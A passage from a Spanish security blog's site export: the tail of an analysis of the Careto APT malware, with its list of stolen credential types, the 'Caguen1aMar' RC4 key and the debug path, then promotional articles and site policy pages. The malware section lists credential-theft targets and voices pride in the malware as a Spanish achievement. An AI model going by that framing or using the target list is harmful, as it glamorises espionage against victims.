que los milenials no lo conoceran) 2. Credenciales de NetBIOS 3. Contraseñas IE7 4. Historial de IE 5. Caché de Firefox 6. Cookies de Firefox 7. Lista de Autocompletar de Firefox 8. Contraseñas de Firefox 2.x 9. Contraseñas de Google Chrome 10. Cuentas, contraseñas y contactos GTalk k) Contraseñas de Google Desktop 11. Contraseñas de Safari 12. Contraseñas Opera 13. Usuarios conectados a la máquina 14. Documentos recientes accedidos 15. Password Dump de cuentas locales 16. CacheDump 17. Contraseñas de Microsoft Outlook 18. Información de red Wifi cercanas o con señal 19. Puntos de acceso inalámbrico en caché 20. Contraseñas inalámbricas en caché 21. Dispositivos Bluetooth almacenados en caché 22. Conexiones en el escritorio remoto en caché 23. Secretos de LSA 24. Contraseñas de WinSCP 25. Credenciales de Putty 26. Contraseñas de Mozilla Thunderbird 27. Contraseñas de Eudora 28. Contraseñas de Incredimail ## Malware made in España Dentro del malware Careto, se encontraron indicios que nos hacen sospechar que su origen es españa, ya no por la codificación del idioma , si no por la exposición de expresiones 100% españolas, las cuales carecen de significado fuera de nuestras fronteras, como por ejemplo: - "Careto" , podría ser la expresión de cara, pero esto no es una afirmación que podamos decir con total afirmación - Se encontraron una clave RC4 de encriptación en la configuración de los datos, usada por todas las comunicaciones con los servidores command and control. "Caguen1aMar" fue la clave, una expresión la cual si podriamos decir que tiene su origuen y uso, unicamente en España. - La configuración de los datos tenia : "Accept-Language:es Accept-Encoding:gzip" - Cuando se debugeo los desinstaladores del módulo SGHTesterCmd, se encontraron rastros de paths de los desarrolladores con palabras como "Pruebas" , exactamente en la ruta "c:\Dev\CaretoPruebas3.0\release32\CDIIUninstall32.pdb" A pesar del uso de estas contraseñas (que podría dar la idea de una programación castiza, casera o descuidada dentro de un ambiente desenfadado) y de la poca profesionalidad que se desprende del uso de un inglés pobre, nos quedamos con esta importante frase en las conclusiones del informe de Kaspersky > En términos de sofisticación, colocamos Careto por encima de Duqu, Gauss, RedOctober o Icefog, por lo que es uno de los APT más complejos que observamos. Afirmaciones que hacen tener sentimientos encontrados, por un lado la cara de la "ciberseguridad" que intenta velar contra estos ataques, pero por otro, un trabajo made in España del que estar orgullo, poniendo el nombre de nuestro pais en el mapa. --- # Seguridad de la información empresarial URL: https://ciberseguridad.blog/seguridad-informacion-empresarial/ Tipo: Artículo Autor: Morgan Media Publicado: 2016-10-24 Actualizado: 2026-10-04 > Ciberseguridad, el blog de seguridad informática, ha comenzado con fuerza para compartir con todos nosotros informaciones, nuevas normativas, consejos [https://ciberseguridad.blog/consejos-ciberseguridad-empresas/] y noticias de actualidad sobre la seguridad de la información empresarial. Si bien el blog nace para analizar desde un punto de vista experto todos los parámetros y temáticas relacionadas con la seguridad informática en su totalidad, la seguridad de la información de las empresas es Ciberseguridad, el blog de seguridad informática, ha comenzado con fuerza para compartir con todos nosotros informaciones, nuevas normativas, consejos y noticias de actualidad sobre la seguridad de la información empresarial. Si bien el blog nace para analizar desde un punto de vista experto todos los parámetros y temáticas relacionadas con la seguridad informática en su totalidad, la seguridad de la información de las empresas es uno de los temas más relevantes por su interés y su cercanía a los lectores. El mundo empresarial nos une tanto en calidad de empresarios, de usuarios o de empleados, así que conocer su evolución en materia de seguridad informática es esencial para todos. Su editor, Rubén Ramiro es profesional en Tecnologías de la Seguridad y Ciberseguridad en Telefónica, lo que acredita su visión experta y su aporte desde el conocimiento y la experiencia en seguridad informática. En el artículo “Ciberseguridad Industrial 4.0”, Rubén nos introduce al concepto de Industria 4.0 derivada de la digitalización masiva. Al hablar de la ciberserguridad señala que, además de las APT (Amenazas Persistentes Avanzadas), el ciberespionaje y el ciberterrorismo, habría que mitigar también otros problemas que veremos a continuación. ## Ciberseguridad.blog: seguridad de la información de las empresas En primer lugar hay que contemplar el Ecosistema Ampliado como seguridad de la información empresarial, ya que una de las características clave de la Industria 4.0 es la interconexión entre entornos. De aquí se derivan problemas de seguridad evidentes, ya que las brechas de seguridad más grandes pueden comenzar con un proveedor dando lugar a la exposición masiva de datos. Según Rubén, este tipo de industria da más oportunidades de recabar información en la parte superior de la cadena de suministro. La utilización de modernas medidas de control de ciberseguridad, la autenticación adaptativa y el análisis del comportamiento pueden se la esperanza para detener el flujo de la cadena de suministro usada por los ciberdelincuentes. [Imagen: Seguridad de la información empresarial] Desafíos de Internet de las Cosas (IoT) porque crea una multitud de puntos de entrada que pueden ser atacados. En sí mismo, el IoT tiene multitud de problemas de seguridad en los niveles más bajos por lo que está abierto a serias vulnerabilidades. En conclusión, las empresas han heredado dichas vulnerabilidades a menos que tomen precaucione especiales para reducirlas en lo referente a la gestión de la seguridad de la información. Para conocer la seguridad de la información empresarial de forma experta es aconsejable recurrir a un auténtico profesional de la seguridad informática. Rubén Ramiro pone a disposición de todos nosotros un blog con contenido de gran calidad por su rigor y exhaustividad expositiva. Suscríbete de forma gratuita a la newsletter y recibirás información actualizada sobre el sector de la seguridad informática y la ciberseguridad. --- # Problemas de ciberseguridad en empresas URL: https://ciberseguridad.blog/problemas-ciberseguridad-empresas/ Tipo: Artículo Autor: Morgan Media Publicado: 2016-10-24 Actualizado: 2026-10-09 > Ciberseguridad es un blog de seguridad informática que aporta una visión experta sobre los problemas de ciberseguridad en empresas. Su editor, Rubén Ramiro, profesional en Tecnologías de la Seguridad y Ciberseguridad en Telefónica nos habla desde una posición experta en una materia que nos afecta a todos: a empresas y a usuarios. En este sentido, los contenidos abarcan todo tipo de temas de forma analítica y precisa, incluyendo consejos de ciberseguridad en las empresas [https://ciberseguridad. Ciberseguridad es un blog de seguridad informática que aporta una visión experta sobre los problemas de ciberseguridad en empresas. Su editor, Rubén Ramiro, profesional en Tecnologías de la Seguridad y Ciberseguridad en Telefónica nos habla desde una posición experta en una materia que nos afecta a todos: a empresas y a usuarios. En este sentido, los contenidos abarcan todo tipo de temas de forma analítica y precisa, incluyendo consejos de ciberseguridad en las empresas desde la experiencia profesional. Este blog aconseja desde el conocimiento que aporta dedicarse de forma profesional al ámbito de la Seguridad y la Ciberseguridad, por lo que todas las publicaciones son realizadas con la minuciosidad y el rigor que se espera de un experto en tecnología de seguridad. Cada post presenta un análisis milimétrico de la temática sobre la que se centra. Veamos, por ejemplo, “Beneficios de las soluciones PAM (Privileged Access Management) y la necesidad de integración con Latch”. ## Ciberseguridad.blog: información experta sobre problemas de ciberseguridad En este artículo que contempla los problemas de ciberseguridad en empresas, establece las ventajas y riesgos del acceso privilegiado. Por otro lado, introduce la Gestión Privilegiada de la Identidad (PIM) y el hecho de que las organizaciones buscan controles más fuertes sobre el acceso privilegiado en las infraestructuras TI por varias razones: por cumplimiento de medidas normativas que recomiendan o exigen controles específicos para la gestión de los riesgos del acceso privilegiado en TI, y por asegurar la competencia de las prácticas empresariales. [Imagen: Problemas de ciberseguridad en empresas] Desarrollando ese último punto relativo a los riesgos de ciberseguridad en las empresas, afirma que el acceso privilegiado controla los aspectos más fundamentales de las infraestructuras TI. Por tanto, se concluye que el control y la segregación de funciones de los usuarios privilegiados ayuda a asegurar la integridad de las políticas, ya que la separación de funciones en el control de usuarios administradores de TI ayuda a que en el registro del día a día no se pueda ocultar actividades irresponsables o ilegales. Este es sólo un breve apunte sobre los problemas y riesgos que se plantean a lo largo del post sobre el acceso privilegiado y las tecnologías de Gestión de Accesos Privilegiados, y la necesidad de integración de Latch con soluciones Privileged Access Management. En Ciberserguridad.blog tienes acceso al contenido completo de la exposición. Los problemas de seguridad afectan a los usuarios finales en la medida en la que afectan en primer lugar a las empresas. Mantenerse informado sobre los problemas de ciberseguridad en empresas y en otras temáticas específicas sobre seguridad informática es esencial. Para ello te aconsejamos que te suscribas a la newsletter de Ciberseguridad.blog y no te pierdas ninguna de sus actualizaciones. Recibirás puntualmente cada nueva publicación de forma gratuita en tu e-mail. --- # Gestionar la seguridad de la información URL: https://ciberseguridad.blog/gestionar-seguridad-informacion/ Tipo: Artículo Autor: Morgan Media Publicado: 2016-10-24 Actualizado: 2026-10-09 > ¿Nos planteamos alguna vez cómo y por qué renunciamos a nuestra información personal y a nuestros datos para facilitar el acceso a aplicaciones y a la conectividad? ¿Tenemos en cuenta la repercusión que puede tener en la seguridad la confianza que manifestamos hacia los desarrolladores de aplicaciones y proveedores? ¿Sabemos cómo gestionar la seguridad de la información? Tales temas que nos afectan de forma tan directa son planteados en Ciberserguridad.blog. Este blog nace con un interés divul ¿Nos planteamos alguna vez cómo y por qué renunciamos a nuestra información personal y a nuestros datos para facilitar el acceso a aplicaciones y a la conectividad? ¿Tenemos en cuenta la repercusión que puede tener en la seguridad la confianza que manifestamos hacia los desarrolladores de aplicaciones y proveedores? ¿Sabemos cómo gestionar la seguridad de la información? Tales temas que nos afectan de forma tan directa son planteados en Ciberserguridad.blog. Este blog nace con un interés divulgativo, para dar a conocer cuáles son las fisuras que existen en la seguridad informática de nuestra vida diaria, de las empresas y de las industrias. Rubén Ramiro es el profesional en Tecnologías de la Seguridad y Ciberseguridad en Telefónica que nos adentra en el complejo mundo de la seguridad informática, pero lo hace desde una posición de experto en la temática. Nos plantea temas importantes e interesantes en un mundo donde ya todo está conectado. En este sentido, la gestión de la seguridad de la información es vital en una era en la que estamos dando el paso, o ya lo hemos dado, hacia la Industria 4.0. ## Ciberseguridad.blog: gestión de la seguridad de la información en un futuro inmediato El artículo “Predicciones Ciberseguridad 2017” mira hacia el futuro para prever qué puede suceder en cuanto a seguridad informática y la importancia de gestionar la seguridad de la información. Los dos primeros puntos que analiza se centran en las contraseñas y en la norma del mínimo privilegio en cuanto a la gestión de la seguridad y el control de la seguridad de la información. A partir de ahí el artículo nos introduce en una tendencia que ya estamos viviendo desde el ámbito de la seguridad: no se nos comunica si un ataque ocurre o cuándo ocurre. [Imagen: Gestionar la seguridad de la información] Con la integración de los sistemas de IoT, la automatización y la Cloud, nadie está seguro de quién es realmente responsable de mantener la seguridad. Para evitar el juego de culpa entre los potenciales responsables, las compañías deben asegurar la comunicación abierta entre la dirección de TI y de negocio para entender las amenazas, las opciones para la seguridad y los desafíos y restricciones que existen dentro de la organización. Gestionar la seguridad de la información, la seguridad informática, la vulnerabilidad de las empresas y de las industrias, los nuevos proyectos de seguridad, las normativas legales… todo nos incumbe como usuarios activos de aplicaciones, o como simples personas que participan en el entramado empresarial e incluso mundial. ¿Quieres estar informado sobre las tendencias en seguridad informática y sobre todo lo que sucede en el ámbito de la ciberseguridad? Suscríbete a la newsletter de Ciberseguridad.blog y recibirás los nuevos artículos con puntualidad en tu e-mail. --- # Controles de la seguridad de la información URL: https://ciberseguridad.blog/controles-seguridad-informacion/ Tipo: Artículo Autor: Morgan Media Publicado: 2016-10-24 Actualizado: 2026-10-09 > Si te interesa estar al día en seguridad informática, controles de la seguridad de la información, seguridad empresarial e industrial… y todo lo que atañe a la ciberseguridad, estás en el blog indicado. Ciberseguridad es un blog cuyos contenidos están desarrollados por Rubén Ramiro, profesional en Tecnologías de la Seguridad y Ciberseguridad en Telefónica. Rubén nos aporta una análisis experto de la realidad y de la actualidad en temas de seguridad informática. Y, por supuesto, nos avanza aque Si te interesa estar al día en seguridad informática, controles de la seguridad de la información, seguridad empresarial e industrial… y todo lo que atañe a la ciberseguridad, estás en el blog indicado. Ciberseguridad es un blog cuyos contenidos están desarrollados por Rubén Ramiro, profesional en Tecnologías de la Seguridad y Ciberseguridad en Telefónica. Rubén nos aporta una análisis experto de la realidad y de la actualidad en temas de seguridad informática. Y, por supuesto, nos avanza aquello que podemos encontrarnos en un futuro analizado y previsto desde una óptica profesional. ¿Qué nos espera en 2017 en seguridad informática y en control de la seguridad de la información? ## Ciberseguridad.blog: control de la seguridad de la información En el artículo “Predicciones Ciberseguridad 2017”, Rubén nos adelanta una visión hacia el futuro de la seguridad realizando una serie de reflexiones. El aumento de la contraseñas. En 2017 se prevé que los mejores servicios de gestión de contraseñas ganen fuerza a medida de que las empresas comprendan su vulnerabilidad en cuanto a los controles de la seguridad de la información. Reducir las amenazas internas se puede lograr a través de una mejor administración de las contraseñas. Rubén establece que la mejor forma sería implementar una solución que las almacene de forma segura y que se roten de forma periódica para garantizar la seguridad. [Imagen: Controles de la seguridad de la información] El privilegio gana poder. 2017 será el año en que las organizaciones inteligentes se pongan serias para proteger los sistemas y a los usuarios privilegiados. ¿Cómo? Identificándolos, supervisando su acceso y cerrándolo a lo que no necesitan. En este sentido, se seguirá la norma del mínimo privilegio en cuanto a la gestión de la seguridad de la información. Un tema muy interesante es cómo las personas estamos dispuestas a renunciar a nuestra información personal y nuestros datos para facilitar el acceso a aplicaciones y la conectividad, porque esta información puede ser explotada y utilizada para otros fines. Existe una confianza desmedida hacia los desarrolladores de aplicaciones y proveedores que aseguran que la información y los accesos están “a buen recaudo”. Estos son sólo dos de los puntos que se plantean en este interesante artículo sobre lo que nos espera en 2017 respecto a ciberseguridad y seguridad informática, y que nos hacen reflexionar. En Ciberseguridad.blog leerás las últimas novedades sobre la seguridad informática, las noticias relevantes, los nuevos avances relativos a los controles de la seguridad de la información y, por supuesto, una visión personal que analiza de forma experta todos los aspectos relacionados con la ciberseguridad. Recibe todas las novedades sobre seguridad informática en tu e-mail y las reflexiones sobre el futuro que espera a la ciberseguridad. Suscríbete a la newsletter para mantenerte informado. --- # Consejos de ciberseguridad en la industria URL: https://ciberseguridad.blog/consejos-ciberseguridad-industria/ Tipo: Artículo Autor: Morgan Media Publicado: 2016-10-24 Actualizado: 2026-10-09 > Rubén Ramiro, profesional en Tecnologías de la Seguridad y Ciberseguridad en Telefónica, es el editor de Ciberseguridad. Este nuevo blog de seguridad informática ha saltado con fuerza a la red para traernos todo tipo de consejos y recomendaciones desde una perspectiva profesional y experta, como los consejos de ciberseguridad en la industria. Los consejos de ciberseguridad industrial son bienvenidos en una temática que siempre está de actualidad por la responsabilidad empresarial y social que Rubén Ramiro, profesional en Tecnologías de la Seguridad y Ciberseguridad en Telefónica, es el editor de Ciberseguridad. Este nuevo blog de seguridad informática ha saltado con fuerza a la red para traernos todo tipo de consejos y recomendaciones desde una perspectiva profesional y experta, como los consejos de ciberseguridad en la industria. Los consejos de ciberseguridad industrial son bienvenidos en una temática que siempre está de actualidad por la responsabilidad empresarial y social que conlleva, y en Ciberseguridad.blog se plantea desde la rigurosidad de la experiencia. Uno de los posts dedicados a esta temática es “Ciberseguridad Industrial 4.0” porque, tal y como señala, es un hecho: la tecnología ha invadido nuestras vidas mediante los ordenadores móviles, los televisores digitalizados y los dispositivos como AppleWatch. En consecuencia, la digitalización de la industria está avanzando como nunca para llevarla a un nuevo estadio: la Industria 4.0. Hay varios puntos que impulsan esta industria: la mejor y mayor conectividad, la mayor globalización, la capacidad de gestionar con un incremento masivo de los datos y, definitivamente, el Internet de las Cosas (IoT). Veamos qué nos plantea desde el punto de vista de la seguridad informática y la industria. ## Ciberseguridad.blog: consejos de ciberseguridad aplicados a la industria La Industria 4.0 forma parte de un ecosistema más grande, como Rubén bien señala. Y dicha complejidad viene asociada a la un aumento de posibles fallos o vulnerabilidades por lo que habría que aplicar medidas y consejos de ciberseguridad en la industria 4.0 desde sus inicios. Al hablar de la ciberseguridad de la Industria 4.0 indica que puede sufrir las mismas amenazas de seguridad que otras organizaciones, y como consejos sobre ciberseguridad industrial establece que hay que tratar de mitigar los siguientes problemas: [Imagen: Consejos-de-ciberseguridad-en-la-industria] Amenazas persistentes avanzadas (APT) y ciberespionaje. La Industria 4.0 es más vulnerables debido a los procesos de negocio inteligentes y conectados que subyacen. Ciberterrorismo. Este es uno de los tipos más temidos de amenaza cibernética hoy en día. La Industria 4.0 está vinculada a internet y, por tanto ,es vulnerable a recibir ataques de seguridad. Ciberseguridad.blog es un blog que ofrece artículos sobre seguridad informática y consejos de ciberseguridad en la industria, entre otras temáticas especializadas como hemos visto con la Industria 4.0. El tratamiento experto de la información y el enfoque con una visión de futuro hacen que este blog sea un referente en todo los relativo a seguridad informática, ataques informáticos, consejos sobre medidas a adoptar, apuntes de actualidad sobre legislación y normativas… En definitiva, todo lo que necesitas saber para estar al día en seguridad informática y ciberseguridad. Para no perderte ninguna actualización y recibir contenido de primera mano, te recomendamos que te suscribas a la newsletter de Ciberseguridad.blog. --- # Consejos de ciberseguridad en empresas URL: https://ciberseguridad.blog/consejos-ciberseguridad-empresas/ Tipo: Artículo Autor: Morgan Media Publicado: 2016-10-23 Actualizado: 2026-10-09 > ¿ Estás al día sobre consejos de ciberseguridad en empresas ? Mantenerse informado es esencial para conocer cuáles son los puntos débiles en el mundo empresarial porque te toca a ti, y nos toca a todos. Rubén Ramiro, como profesional en Tecnologías de la Seguridad y Ciberseguridad en Telefónica, ha lanzado un nuevo blog para compartir con todos nosotros sus conocimientos expertos sobre seguridad informática y consejos de ciberseguridad empresarial. Cada uno de los artículos que nos ofrece es ¿ Estás al día sobre consejos de ciberseguridad en empresas ? Mantenerse informado es esencial para conocer cuáles son los puntos débiles en el mundo empresarial porque te toca a ti, y nos toca a todos. Rubén Ramiro, como profesional en Tecnologías de la Seguridad y Ciberseguridad en Telefónica, ha lanzado un nuevo blog para compartir con todos nosotros sus conocimientos expertos sobre seguridad informática y consejos de ciberseguridad empresarial. Cada uno de los artículos que nos ofrece están basados en una experiencia profesional y experta, y nos plantea problemas comunes desde una perspectiva analítica y minuciosa. ¿Sabías que a día de hoy las empresas más importantes cada vez son más vulnerables? En el post “Ciberseguridad basada en Big Data” nos adelanta su visión sobre seguridad empresarial al mismo tiempo que introduce el proyecto Apache Merton para detectar los riesgos en seguridad. ## Ciberseguridad.blog: consejos de ciberseguridad aplicados a la empresa ¿Por qué las empresas son cada vez más vulnerables? Esta es la pregunta que nos planteamos al sopesar consejos de ciberseguridad en empresas, y la respuesta que obtenemos es la siguiente: por vivir en un ecosistema digital basado en el Internet de las Cosas (IoT), en API’s y en aplicaciones Cloud. Las soluciones tradicionales de seguridad no pueden dar una solución integral que combine la seguridad con el gobierno de datos, la auditoría y los atributos de calidad, según Rubén. [Imagen: consejos-de-ciberseguridad-en-empresas] En consecuencia, las empresas han comenzado a invertir en plataformas integradas de Centro de Operaciones de Seguridad (SOC) que disponen de capacidades centralizadas. Empresas como Hortonworks, Rackspace, ManTech y B23 iniciaron un proyecto mundial: Apache Merton, cuyo objetivo es crear un proyecto de código abierto dedicado a proporcionar una plataforma de análisis de seguridad para detectar los riesgos de seguridad en tiempo real. En este artículo, Rubén nos acerca a Apache Merton entre los Consejos sobre ciberseguridad en la industria consejos sobre ciberseguridad empresarial, ya que empezó a cambiar las reglas del juego de seguridad en el que se dispone de un gran número de datos y es necesario tratarlos correctamente. Las informaciones, las nuevas medidas de seguridad y los consejos de ciberseguridad en empresas avanzan en el día a día a velocidad de vértigo. Para mantenerse informado de lo que sucede en todos los ámbitos de la seguridad informática y de la ciberseguridad es necesario acudir a fuentes de primera mano. Un blog especializado, como Ciberseguridad.blog, es una web que te aportará información experta contrastada con un análisis personal realizado desde el conocimiento. ¿Quieres estar al tanto de las últimas novedades en seguridad informática, legislación y las noticias relevantes sobre esta temática? Suscríbete a la newsletter y recibirás todas las actualizaciones del blog de forma inmediata. Sé el primero en conocer los nuevos contenidos de Ciberseguridad.blog. --- # Política de cookies URL: https://ciberseguridad.blog/politica-de-cookies/ Tipo: Página Publicado: 2026-10-08 Usamos cookies propias técnicas (recordar tu elección de consentimiento) y, solo si lo aceptas, cookies de terceros de Google para medición (Analytics) y publicidad (AdSense). Al entrar puedes aceptar, rechazar o configurar; tu elección se guarda hasta 13 meses y puedes cambiarla desde "Gestionar cookies", en el pie de página. Medición agregada con Cloudflare Web Analytics, sin cookies ni identificadores; base jurídica: interés legítimo. --- # Aviso legal URL: https://ciberseguridad.blog/aviso-legal/ Tipo: Página Publicado: 2026-10-08 Titular: Rubén García Ramiro · NIF 70247860H · Huelva (España) · hola@ciberseguridad.blog. Sitio web personal con actividad publicitaria, conforme al artículo 10 de la Ley 34/2002 (LSSI). El contenido se ofrece con fines informativos; el titular no se responsabiliza del uso que se haga de él. Los textos son del autor que los firma y están protegidos por derechos de autor; se permite citarlos con enlace a la fuente. Las marcas y logotipos citados pertenecen a sus titulares y se usan con fines informativos. --- # Política editorial URL: https://ciberseguridad.blog/politica-editorial/ Tipo: Página Publicado: 2026-09-29 Actualizado: 2026-10-08 ## Qué publicamos Artículos de análisis y guías elaboradas por los autores, y noticias sobre incidentes, vulnerabilidades y normativa. Cada noticia se contrasta con al menos dos fuentes, una de ellas primaria (aviso del fabricante, organismo oficial o informe del investigador), y enlaza a esas fuentes. ## Cómo trabajamos Escribimos en español propio; no traducimos ni reproducimos textos de terceros. Las citas van entrecomilladas y atribuidas. Las imágenes son propias, generadas por nosotros o con licencia que permite su uso, siempre con crédito. ## Independencia La publicidad del sitio la sirve Google AdSense y está identificada como tal. No aceptamos contenido patrocinado sin marcarlo. No hay enlaces de afiliación. Los autores no escriben sobre productos de su empleador sin declararlo. ## Uso de inteligencia artificial Utilizamos herramientas de IA para documentarnos, estructurar borradores y generar ilustraciones. Toda pieza que publicamos la revisa y firma una persona, responsable de su contenido. ## Correcciones Si detectamos o nos comunican un error, corregimos el texto, señalamos la corrección al pie con su fecha y, si el error cambia el sentido de la pieza, lo indicamos en el titular. Escríbenos a hola@ciberseguridad.blog. ## Autores Cada artículo lleva el nombre de quien lo escribe, con su perfil en la página de equipo. --- # Contacto URL: https://ciberseguridad.blog/contacto/ Tipo: Página Publicado: 2026-09-29 Actualizado: 2026-10-08 Redacción, propuestas de temas y correcciones: hola@ciberseguridad.blog. Revisamos cada aviso de error y, si procede, corregimos el texto e indicamos la fecha de la corrección al pie del artículo. Publicidad y colaboraciones: hola@ciberseguridad.blog, indicando "Publicidad" en el asunto. Solo aceptamos acuerdos que se identifiquen como tales en el sitio. Protección de datos: hola@ciberseguridad.blog, indicando "Privacidad" en el asunto. Respondemos en un plazo de cinco días laborables. No atendemos consultas de soporte técnico personal ni peticiones de ayuda para acceder a sistemas ajenos. Síguenos en LinkedIn (enlaces al pie de esta página) o por RSS en ciberseguridad.blog/rss/. LinkedIn --- # Quiénes somos URL: https://ciberseguridad.blog/quienes-somos/ Tipo: Página Publicado: 2026-09-29 Actualizado: 2026-10-08 ciberseguridad.blog es un medio independiente en español sobre seguridad informática, nacido en 2017 y cocinado a fuego lento por profesionales que trabajan en el sector. Publicamos artículos de fondo, guías prácticas y noticias sobre vulnerabilidades, ataques, malware, privacidad y herramientas, pensados para quien se dedica a la ciberseguridad y para quien quiere entrar en ella. No vendemos productos ni servicios. Nos financiamos con publicidad, claramente identificada, que no influye en lo que publicamos. Los autores firman con su nombre y escriben a título personal; sus opiniones no representan a las empresas para las que trabajan. Más de 200 artículos publicados, organizados por temas. Si quieres saber cómo elegimos y revisamos lo que publicamos, lee nuestra política editorial. Si quieres proponer un tema, corregir un error o hablar con nosotros, aquí está el contacto. --- # Política de privacidad URL: https://ciberseguridad.blog/politica-de-privacidad/ Tipo: Página Publicado: 2017-01-06 Actualizado: 2026-10-08 ## Responsable Rubén García Ramiro, hola@ciberseguridad.blog. Datos de contacto completos en el aviso legal. ## Qué datos tratamos y para qué - Medición de audiencia (Google Analytics 4): datos de navegación seudonimizados, solo si aceptas las cookies de análisis. Base jurídica: tu consentimiento. - Publicidad (Google AdSense): si aceptas, Google y sus socios pueden mostrar anuncios personalizados mediante cookies; si rechazas, verás anuncios no personalizados o ninguno. Base jurídica: tu consentimiento, gestionado con la plataforma de consentimiento de Google (marco TCF de IAB Europe). - Contacto por correo: nombre, correo y el contenido de tu mensaje, para responderte. Base jurídica: tu solicitud. Conservación: un año. - Registro técnico del servidor (dirección IP, fecha y página solicitada): seguridad y funcionamiento del sitio, en Cloudflare, durante 30 días. Base jurídica: interés legítimo. - Medición agregada con Cloudflare Web Analytics, sin cookies ni identificadores; base jurídica: interés legítimo. No hay boletín, registro de usuarios ni comentarios. No vendemos datos ni los cedemos salvo a los proveedores anteriores (Google y Cloudflare), con los que existen contratos conforme al RGPD; cuando hay transferencia fuera del Espacio Económico Europeo, se ampara en el Marco de Privacidad de Datos UE-EE. UU. o en cláusulas contractuales tipo. ## Tus derechos Acceso, rectificación, supresión, oposición, limitación y portabilidad, escribiendo a hola@ciberseguridad.blog con "Privacidad" en el asunto. Puedes retirar el consentimiento en cualquier momento desde "Gestionar cookies", en el pie de página. Si consideras que no hemos tratado bien tus datos, puedes reclamar ante la Agencia Española de Protección de Datos (aepd.es). Última actualización: 8 de octubre de 2026.